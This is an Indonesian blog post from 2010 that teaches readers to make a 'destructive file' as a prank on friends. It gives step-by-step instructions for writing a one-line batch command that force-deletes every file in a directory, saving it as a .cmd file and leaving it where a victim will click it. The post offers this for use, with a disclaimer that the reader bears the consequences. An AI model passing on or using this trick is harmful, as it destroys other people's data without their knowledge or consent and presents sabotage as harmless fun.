RSS

Bikin File Perusak tapi tak bisa di katakan virus

28 Jun

Browsing browsing eh malah nemu artikel beginian,,ya udah ku posting aja ya…let’s check it…

Membuat virus !sebenarnya mudah (padahal blom bisa,,,hehe)tapi kali ini aq mau berbagi cara membuat file perusak
tapi belum bisa di katakan virus ataupun spam,tapi hanya file perusak saja.
Proses kerjanya :
apabila file ini di klik maka secara otomatis semua file yang ada di direktori D akan terhapus.
Lumayan kan buat ngejailin temen he he he…(tapi ada kelemahannya yaitu file yang ada di dalam folder
tidak terhapus,tapi ada cara untuk mengatasinya ,tinggal letakkan aja di dalam foldernya ntar juga hilang)

terus gimana buat filenya,,,,???nih caranya

1.buka note pad
2.ketik DEL /F /Q *
3.save dengan akhiran(ektensiI) .cmd
Contoh: test.cmd
4.udah ,kamu tinggal letakkan di direktori D ,dan apabila ada yang mengklik file tadi maka hilang deh semua filenya.

nah,,,silakan di coba jika ada kesalahan,,,,,tanggung sendiri ya,,
Oke,,mungkin cukup segitu…..
Peace Salam 2 jari…haha

 
1 Komentar

Ditulis oleh pada Juni 28, 2010 in Info Teknologi, Script

 

One response to “Bikin File Perusak tapi tak bisa di katakan virus

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

 
%d blogger menyukai ini: